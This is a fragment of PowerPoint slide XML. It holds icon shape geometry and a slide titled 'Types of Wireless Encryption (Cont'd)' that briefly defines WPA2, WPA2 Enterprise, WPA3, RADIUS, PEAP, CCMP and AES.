                <a:gd name="T4" fmla="*/ 195108 w 452"/>
                <a:gd name="T5" fmla="*/ 11703 h 462"/>
                <a:gd name="T6" fmla="*/ 195108 w 452"/>
                <a:gd name="T7" fmla="*/ 8102 h 462"/>
                <a:gd name="T8" fmla="*/ 191062 w 452"/>
                <a:gd name="T9" fmla="*/ 8102 h 462"/>
                <a:gd name="T10" fmla="*/ 71480 w 452"/>
                <a:gd name="T11" fmla="*/ 80124 h 462"/>
                <a:gd name="T12" fmla="*/ 4046 w 452"/>
                <a:gd name="T13" fmla="*/ 135490 h 462"/>
                <a:gd name="T14" fmla="*/ 15735 w 452"/>
                <a:gd name="T15" fmla="*/ 147644 h 462"/>
                <a:gd name="T16" fmla="*/ 39561 w 452"/>
                <a:gd name="T17" fmla="*/ 139542 h 462"/>
                <a:gd name="T18" fmla="*/ 67883 w 452"/>
                <a:gd name="T19" fmla="*/ 167450 h 462"/>
                <a:gd name="T20" fmla="*/ 59791 w 452"/>
                <a:gd name="T21" fmla="*/ 191307 h 462"/>
                <a:gd name="T22" fmla="*/ 67883 w 452"/>
                <a:gd name="T23" fmla="*/ 203461 h 462"/>
                <a:gd name="T24" fmla="*/ 123628 w 452"/>
                <a:gd name="T25" fmla="*/ 135490 h 462"/>
                <a:gd name="T26" fmla="*/ 135317 w 452"/>
                <a:gd name="T27" fmla="*/ 67520 h 462"/>
                <a:gd name="T28" fmla="*/ 135317 w 452"/>
                <a:gd name="T29" fmla="*/ 67520 h 462"/>
                <a:gd name="T30" fmla="*/ 135317 w 452"/>
                <a:gd name="T31" fmla="*/ 43663 h 462"/>
                <a:gd name="T32" fmla="*/ 159143 w 452"/>
                <a:gd name="T33" fmla="*/ 43663 h 462"/>
                <a:gd name="T34" fmla="*/ 159143 w 452"/>
                <a:gd name="T35" fmla="*/ 67520 h 462"/>
                <a:gd name="T36" fmla="*/ 135317 w 452"/>
                <a:gd name="T37" fmla="*/ 67520 h 4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2" h="462">
                  <a:moveTo>
                    <a:pt x="275" y="301"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="275" y="301"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="275" y="301"/>
                    <a:pt x="451" y="169"/>
                    <a:pt x="434" y="26"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="434" y="18"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="425" y="18"/>
                    <a:pt x="425" y="18"/>
                    <a:pt x="425" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="284" y="0"/>
                    <a:pt x="159" y="178"/>
                    <a:pt x="159" y="178"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="53" y="159"/>
                    <a:pt x="62" y="186"/>
                    <a:pt x="9" y="301"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="328"/>
                    <a:pt x="18" y="328"/>
                    <a:pt x="35" y="328"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="53" y="319"/>
                    <a:pt x="88" y="310"/>
                    <a:pt x="88" y="310"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="372"/>
                    <a:pt x="151" y="372"/>
                    <a:pt x="151" y="372"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="372"/>
                    <a:pt x="141" y="407"/>
                    <a:pt x="133" y="425"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="124" y="443"/>
                    <a:pt x="133" y="461"/>
                    <a:pt x="151" y="452"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="266" y="398"/>
                    <a:pt x="292" y="407"/>
                    <a:pt x="275" y="301"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="301" y="150"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="301" y="150"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="284" y="133"/>
                    <a:pt x="284" y="115"/>
                    <a:pt x="301" y="97"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="319" y="80"/>
                    <a:pt x="345" y="80"/>
                    <a:pt x="354" y="97"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="372" y="115"/>
                    <a:pt x="372" y="133"/>
                    <a:pt x="354" y="150"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="345" y="169"/>
                    <a:pt x="319" y="169"/>
                    <a:pt x="301" y="15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6C1D8488-A6DB-4127-80A8-867147A29734}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8849762" y="4255286"/>
            <a:ext cx="565293" cy="565293"/>
            <a:chOff x="8699862" y="4255286"/>
            <a:chExt cx="565293" cy="565293"/>
          </a:xfrm>
        </p:grpSpPr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C7B7B8A6-B30F-4EC2-925C-F2327B268092}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="8699862" y="4255286"/>
              <a:ext cx="565293" cy="565293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8575">
              <a:solidFill>
                <a:schemeClr val="tx2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5" name="Freeform 79">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D3A43B7-92DE-4CB4-B61F-E4AEB73F0B9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821618" y="4375851"/>
              <a:ext cx="321781" cy="324163"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 106933 w 479"/>
                <a:gd name="T1" fmla="*/ 0 h 479"/>
                <a:gd name="T2" fmla="*/ 106933 w 479"/>
                <a:gd name="T3" fmla="*/ 0 h 479"/>
                <a:gd name="T4" fmla="*/ 0 w 479"/>
                <a:gd name="T5" fmla="*/ 107725 h 479"/>
                <a:gd name="T6" fmla="*/ 106933 w 479"/>
                <a:gd name="T7" fmla="*/ 215449 h 479"/>
                <a:gd name="T8" fmla="*/ 213866 w 479"/>
                <a:gd name="T9" fmla="*/ 107725 h 479"/>
                <a:gd name="T10" fmla="*/ 106933 w 479"/>
                <a:gd name="T11" fmla="*/ 0 h 479"/>
                <a:gd name="T12" fmla="*/ 198206 w 479"/>
                <a:gd name="T13" fmla="*/ 107725 h 479"/>
                <a:gd name="T14" fmla="*/ 198206 w 479"/>
                <a:gd name="T15" fmla="*/ 107725 h 479"/>
                <a:gd name="T16" fmla="*/ 178520 w 479"/>
                <a:gd name="T17" fmla="*/ 163615 h 479"/>
                <a:gd name="T18" fmla="*/ 174493 w 479"/>
                <a:gd name="T19" fmla="*/ 147840 h 479"/>
                <a:gd name="T20" fmla="*/ 178520 w 479"/>
                <a:gd name="T21" fmla="*/ 115838 h 479"/>
                <a:gd name="T22" fmla="*/ 166439 w 479"/>
                <a:gd name="T23" fmla="*/ 91949 h 479"/>
                <a:gd name="T24" fmla="*/ 142726 w 479"/>
                <a:gd name="T25" fmla="*/ 80230 h 479"/>
                <a:gd name="T26" fmla="*/ 154806 w 479"/>
                <a:gd name="T27" fmla="*/ 39664 h 479"/>
                <a:gd name="T28" fmla="*/ 131093 w 479"/>
                <a:gd name="T29" fmla="*/ 27945 h 479"/>
                <a:gd name="T30" fmla="*/ 134673 w 479"/>
                <a:gd name="T31" fmla="*/ 23889 h 479"/>
                <a:gd name="T32" fmla="*/ 198206 w 479"/>
                <a:gd name="T33" fmla="*/ 107725 h 479"/>
                <a:gd name="T34" fmla="*/ 94853 w 479"/>
                <a:gd name="T35" fmla="*/ 19832 h 479"/>
                <a:gd name="T36" fmla="*/ 94853 w 479"/>
                <a:gd name="T37" fmla="*/ 19832 h 479"/>
                <a:gd name="T38" fmla="*/ 83220 w 479"/>
                <a:gd name="T39" fmla="*/ 27945 h 479"/>
                <a:gd name="T40" fmla="*/ 67113 w 479"/>
                <a:gd name="T41" fmla="*/ 39664 h 479"/>
                <a:gd name="T42" fmla="*/ 51453 w 479"/>
                <a:gd name="T43" fmla="*/ 59947 h 479"/>
                <a:gd name="T44" fmla="*/ 59507 w 479"/>
                <a:gd name="T45" fmla="*/ 71666 h 479"/>
                <a:gd name="T46" fmla="*/ 79193 w 479"/>
                <a:gd name="T47" fmla="*/ 71666 h 479"/>
                <a:gd name="T48" fmla="*/ 110960 w 479"/>
                <a:gd name="T49" fmla="*/ 107725 h 479"/>
                <a:gd name="T50" fmla="*/ 83220 w 479"/>
                <a:gd name="T51" fmla="*/ 131613 h 479"/>
                <a:gd name="T52" fmla="*/ 79193 w 479"/>
                <a:gd name="T53" fmla="*/ 151896 h 479"/>
                <a:gd name="T54" fmla="*/ 79193 w 479"/>
                <a:gd name="T55" fmla="*/ 175785 h 479"/>
                <a:gd name="T56" fmla="*/ 59507 w 479"/>
                <a:gd name="T57" fmla="*/ 155502 h 479"/>
                <a:gd name="T58" fmla="*/ 55480 w 479"/>
                <a:gd name="T59" fmla="*/ 128008 h 479"/>
                <a:gd name="T60" fmla="*/ 39373 w 479"/>
                <a:gd name="T61" fmla="*/ 107725 h 479"/>
                <a:gd name="T62" fmla="*/ 47426 w 479"/>
                <a:gd name="T63" fmla="*/ 83836 h 479"/>
                <a:gd name="T64" fmla="*/ 23713 w 479"/>
                <a:gd name="T65" fmla="*/ 76173 h 479"/>
                <a:gd name="T66" fmla="*/ 94853 w 479"/>
                <a:gd name="T67" fmla="*/ 19832 h 479"/>
                <a:gd name="T68" fmla="*/ 79193 w 479"/>
                <a:gd name="T69" fmla="*/ 195617 h 479"/>
                <a:gd name="T70" fmla="*/ 79193 w 479"/>
                <a:gd name="T71" fmla="*/ 195617 h 479"/>
                <a:gd name="T72" fmla="*/ 91273 w 479"/>
                <a:gd name="T73" fmla="*/ 187504 h 479"/>
                <a:gd name="T74" fmla="*/ 106933 w 479"/>
                <a:gd name="T75" fmla="*/ 183447 h 479"/>
                <a:gd name="T76" fmla="*/ 131093 w 479"/>
                <a:gd name="T77" fmla="*/ 175785 h 479"/>
                <a:gd name="T78" fmla="*/ 158386 w 479"/>
                <a:gd name="T79" fmla="*/ 183447 h 479"/>
                <a:gd name="T80" fmla="*/ 106933 w 479"/>
                <a:gd name="T81" fmla="*/ 199674 h 479"/>
                <a:gd name="T82" fmla="*/ 79193 w 479"/>
                <a:gd name="T83" fmla="*/ 195617 h 47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79" h="479">
                  <a:moveTo>
                    <a:pt x="239" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="239" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="0"/>
                    <a:pt x="0" y="106"/>
                    <a:pt x="0" y="239"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="372"/>
                    <a:pt x="106" y="478"/>
                    <a:pt x="239" y="478"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="372" y="478"/>
                    <a:pt x="478" y="372"/>
                    <a:pt x="478" y="239"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="478" y="106"/>
                    <a:pt x="372" y="0"/>
                    <a:pt x="239" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="443" y="239"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="443" y="239"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="443" y="292"/>
                    <a:pt x="425" y="328"/>
                    <a:pt x="399" y="363"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="390" y="363"/>
                    <a:pt x="381" y="345"/>
                    <a:pt x="390" y="328"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="399" y="310"/>
                    <a:pt x="399" y="275"/>
                    <a:pt x="399" y="257"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="399" y="239"/>
                    <a:pt x="390" y="204"/>
                    <a:pt x="372" y="204"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="346" y="204"/>
                    <a:pt x="337" y="204"/>
                    <a:pt x="319" y="178"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="301" y="124"/>
                    <a:pt x="372" y="115"/>
                    <a:pt x="346" y="88"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="337" y="80"/>
                    <a:pt x="301" y="115"/>
                    <a:pt x="293" y="62"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="301" y="53"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="381" y="80"/>
                    <a:pt x="443" y="150"/>
                    <a:pt x="443" y="239"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="212" y="44"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="212" y="44"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="53"/>
                    <a:pt x="194" y="53"/>
                    <a:pt x="186" y="62"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="168" y="80"/>
                    <a:pt x="159" y="71"/>
                    <a:pt x="150" y="88"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="141" y="106"/>
                    <a:pt x="115" y="124"/>
                    <a:pt x="115" y="133"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="142"/>
                    <a:pt x="133" y="159"/>
                    <a:pt x="133" y="159"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="141" y="150"/>
                    <a:pt x="159" y="150"/>
                    <a:pt x="177" y="159"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="186" y="159"/>
                    <a:pt x="275" y="169"/>
                    <a:pt x="248" y="239"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="239" y="266"/>
                    <a:pt x="194" y="257"/>
                    <a:pt x="186" y="292"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="186" y="301"/>
                    <a:pt x="186" y="328"/>
                    <a:pt x="177" y="337"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="345"/>
                    <a:pt x="186" y="390"/>
                    <a:pt x="177" y="390"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="168" y="390"/>
                    <a:pt x="133" y="345"/>
                    <a:pt x="133" y="345"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="337"/>
                    <a:pt x="124" y="310"/>
                    <a:pt x="124" y="284"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="124" y="266"/>
                    <a:pt x="88" y="266"/>
                    <a:pt x="88" y="239"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="88" y="213"/>
                    <a:pt x="106" y="195"/>
                    <a:pt x="106" y="186"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="97" y="169"/>
                    <a:pt x="62" y="169"/>
                    <a:pt x="53" y="169"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="80" y="97"/>
                    <a:pt x="141" y="53"/>
                    <a:pt x="212" y="44"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="177" y="434"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="177" y="434"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="186" y="425"/>
                    <a:pt x="186" y="416"/>
                    <a:pt x="204" y="416"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="212" y="416"/>
                    <a:pt x="221" y="416"/>
                    <a:pt x="239" y="407"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="248" y="407"/>
                    <a:pt x="275" y="398"/>
                    <a:pt x="293" y="390"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="310" y="390"/>
                    <a:pt x="346" y="398"/>
                    <a:pt x="354" y="407"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="319" y="434"/>
                    <a:pt x="284" y="443"/>
                    <a:pt x="239" y="443"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="221" y="443"/>
                    <a:pt x="194" y="443"/>
                    <a:pt x="177" y="43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4544370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682582" y="268069"/>
            <a:ext cx="8826840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rPr>
              <a:t>Types of  Wireless Encryption (Cont’d)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" b="1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6BAF7D5-092F-4B66-A14C-A4506B3EB16C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4571831" y="1258193"/>
            <a:ext cx="2430382" cy="951607"/>
            <a:chOff x="4648031" y="1019016"/>
            <a:chExt cx="2430382" cy="951607"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="55" name="TextBox 54"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="4648031" y="1019016"/>
              <a:ext cx="2109745" cy="369332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lvl="0">
                <a:spcBef>
                  <a:spcPts val="700"/>
                </a:spcBef>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="3FA8B3"/>
                  </a:solidFill>
                  <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>WPA2 Enterprise</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56" name="Rectangle 55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="4648031" y="1355070"/>
              <a:ext cx="2430382" cy="61555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spcBef>
                  <a:spcPts val="700"/>
                </a:spcBef>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1700" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>Integrates EAP standards with WPA2 encryption </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="TextBox 56"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6906601" y="2287099"/>
            <a:ext cx="1074333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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>RADIUS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="Rectangle 57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6906601" y="2606040"/>
            <a:ext cx="4447358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spcBef>
                <a:spcPts val="700"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A centralized authentication and authorization management system</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="TextBox 58"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7523533" y="3403033"/>
            <a:ext cx="808235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b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>PEAP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="Rectangle 59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7523532" y="3708101"/>
            <a:ext cx="4287467" cy="83099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spcBef>
                <a:spcPts val="700"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A protocol that encapsulates the EAP within an encrypted and authenticated transport layer security (TLS) tunnel</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="TextBox 60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8156273" y="4713484"/>
            <a:ext cx="838948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>
              <a:spcBef>
                <a:spcPts val="700"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>WPA3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62" name="Rectangle 61"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="8156272" y="5015190"/>
            <a:ext cx="3776120" cy="83099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spcBef>
                <a:spcPts val="700"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A third-generation Wi-Fi security protocol that uses GCMP-256 for encryption and HMAC-SHA-384 for authentication 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3624031" y="2287099"/>
            <a:ext cx="938077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 algn="r">
              <a:spcBef>
                <a:spcPts val="700"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>CCMP</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="Rectangle 65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609601" y="2606040"/>
            <a:ext cx="3952508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>
              <a:spcBef>
                <a:spcPts val="700"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>An encryption protocol used in WPA2 for stronger encryption and authentication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3423176" y="3403033"/>
            <a:ext cx="622286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r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>AES</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent3">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="Rectangle 67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="3700407"/>
            <a:ext cx="3207262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>
              <a:spcBef>
                <a:spcPts val="700"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A symmetric-key encryption, used in WPA2 as a replacement for TKIP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2558019" y="4713484"/>
            <a:ext cx="838949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r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Rockwell" panose="02060603020205020403" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>WPA2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="70" name="Rectangle 69"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="506436" y="5015190"/>
            <a:ext cx="2890532" cy="83099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>
              <a:spcBef>
                <a:spcPts val="700"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:t>An upgrade to WPA using AES and CCMP for wireless data encryption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4BDA5E9-3248-47C8-AD32-CCEBC995F9B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3544641" y="2377848"/>
            <a:ext cx="4467250" cy="4186242"/>
            <a:chOff x="3565397" y="2393088"/>
            <a:chExt cx="4467250" cy="4186242"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="7" name="Group 6"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3565397" y="2393088"/>
              <a:ext cx="4467250" cy="4186242"/>
              <a:chOff x="3824310" y="2671766"/>
              <a:chExt cx="4467250" cy="4186242"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="259" name="Freeform 257"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6737389" y="4897443"/>
                <a:ext cx="1533534" cy="1949452"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 793 w 810"/>
                  <a:gd name="T1" fmla="*/ 103 h 1029"/>
                  <a:gd name="T2" fmla="*/ 700 w 810"/>
                  <a:gd name="T3" fmla="*/ 10 h 1029"/>
                  <a:gd name="T4" fmla="*/ 662 w 810"/>
                  <a:gd name="T5" fmla="*/ 10 h 1029"/>
                  <a:gd name="T6" fmla="*/ 569 w 810"/>
                  <a:gd name="T7" fmla="*/ 103 h 1029"/>
                  <a:gd name="T8" fmla="*/ 588 w 810"/>
                  <a:gd name="T9" fmla="*/ 150 h 1029"/>
                  <a:gd name="T10" fmla="*/ 628 w 810"/>
                  <a:gd name="T11" fmla="*/ 150 h 1029"/>
                  <a:gd name="T12" fmla="*/ 628 w 810"/>
                  <a:gd name="T13" fmla="*/ 586 h 1029"/>
                  <a:gd name="T14" fmla="*/ 596 w 810"/>
                  <a:gd name="T15" fmla="*/ 618 h 1029"/>
                  <a:gd name="T16" fmla="*/ 137 w 810"/>
                  <a:gd name="T17" fmla="*/ 621 h 1029"/>
                  <a:gd name="T18" fmla="*/ 0 w 810"/>
                  <a:gd name="T19" fmla="*/ 759 h 1029"/>
                  <a:gd name="T20" fmla="*/ 0 w 810"/>
                  <a:gd name="T21" fmla="*/ 1029 h 1029"/>
                  <a:gd name="T22" fmla="*/ 106 w 810"/>
                  <a:gd name="T23" fmla="*/ 1029 h 1029"/>
                  <a:gd name="T24" fmla="*/ 106 w 810"/>
                  <a:gd name="T25" fmla="*/ 759 h 1029"/>
                  <a:gd name="T26" fmla="*/ 138 w 810"/>
